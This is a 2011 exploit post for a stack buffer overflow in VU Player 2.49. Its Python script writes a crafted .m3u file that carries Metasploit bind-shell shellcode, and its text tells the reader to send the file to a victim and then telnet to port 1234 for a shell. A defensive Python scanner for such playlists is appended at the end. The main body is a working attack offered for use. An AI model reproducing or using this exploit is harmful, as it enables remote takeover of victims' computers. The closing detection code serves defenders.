VU Player stack buffer overflow Local Exploit

This is a VU Player stack buffer overflow exploit. It is a local exploit.
When you run this exploit, a malformed .m3u file will be generated.
Change the shellcode according to your purpose.
The shellcode I have added is a bad-character-free windows_shell_bind_tcp generated from the Metasploit Framework.
If you use this shellcode, after the victim opens the malformed m3u, you just have to telnet to the victim on port 1234 to get a shell.

I have submitted the code to the injector vulnerability database.
You can also find it at http://1337day.com/exploits/16741

# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Email debasishm89@gmail.com
# Software Link: http://www.brothersoft.com/vuplayer-62979.html
# Category: Local
# Tested on: Windows XP SP2.


#!/usr/bin/python
from struct import pack
print "######################################################"
print "##   VU Player Local BO Exploit                     ##"
print "##   http://www.brothersoft.com/vuplayer-62979.html ##"
print "##   Author :: Debasish Mandal                      ##"
print "##   Email : debasishm89@gmail.com                  ##"
print "##   http://www.facebook.com/raza.whitehat          ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")
f = open('victim.m3u','w')
junk = "A"*1012
eip = pack('<L',0x77D7754A)  # JMP ESP @ USER32.dll
nop = "\x90" *10    # NOPs [To make the exploit smooth]

#Shell Code Starts Here
# Bad characters: \x00 \x09 \x0a \x1a
# Generated from Metasploit Framework
#Name : windows/shell/bind_tcp
#LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
"\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0"
"\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12"
"\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d"
"\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99"
"\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73"
"\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d"
"\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a"
"\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7"
"\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58"
"\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2"
"\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85"
"\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb"
"\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4"
"\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a"
"\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5"
"\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b"
"\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e"
"\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b"
"\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d"
"\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d"
"\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67")
payload = (junk+eip+nop+shellcode)
print "[*]Writing payload to the file victim.m3u"
f.write(payload)
f.close()
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"


# 1337day.com [2011-08-22]
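
For defenders, the file written by the script above has a recognisable shape: one playlist entry of more than a thousand bytes, mostly a single repeated filler byte, followed by non-printable bytes. The Python 3 triage check below is an added example, not part of the original post; the thresholds MAX_ENTRY_LEN and MIN_FILLER_RUN, the function names and the sample inputs are assumptions constructed for illustration.

```python
import string

# Thresholds are assumptions for this example, not values from the post.
MAX_ENTRY_LEN = 260    # Windows MAX_PATH as an upper bound for one entry
MIN_FILLER_RUN = 64    # shortest run of one repeated byte worth flagging
# Assumes ASCII paths; playlists with non-ASCII file names trip this check.
PRINTABLE = set(string.printable.encode("ascii"))


def longest_run(data):
    """Length of the longest run of one repeated byte value in data."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def scan_m3u(data):
    """Return (line_number, reasons) for each suspicious entry in raw bytes."""
    findings = []
    for num, line in enumerate(data.splitlines(), start=1):
        if line.startswith(b"#"):    # #EXTM3U / #EXTINF directives and comments
            continue
        reasons = []
        if len(line) > MAX_ENTRY_LEN:
            reasons.append("entry length %d exceeds %d" % (len(line), MAX_ENTRY_LEN))
        if longest_run(line) >= MIN_FILLER_RUN:
            reasons.append("long run of a repeated byte")
        if any(b not in PRINTABLE for b in line):
            reasons.append("non-printable bytes in entry")
        if reasons:
            findings.append((num, reasons))
    return findings


# Constructed samples: a normal playlist, and a file with the same shape as the
# one the script above writes (filler, then binary bytes); no working payload.
BENIGN = b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\nC:\\Music\\track01.mp3\r\n"
CRAFTED_SHAPE = b"A" * 1012 + b"\x90" * 14

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("crafted-shape", CRAFTED_SHAPE)):
        print(name, scan_m3u(blob))
```

The same three checks can run at a mail gateway or file share before a playlist reaches a player; any one reason alone is a weak signal, all three together match the file described in this post.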
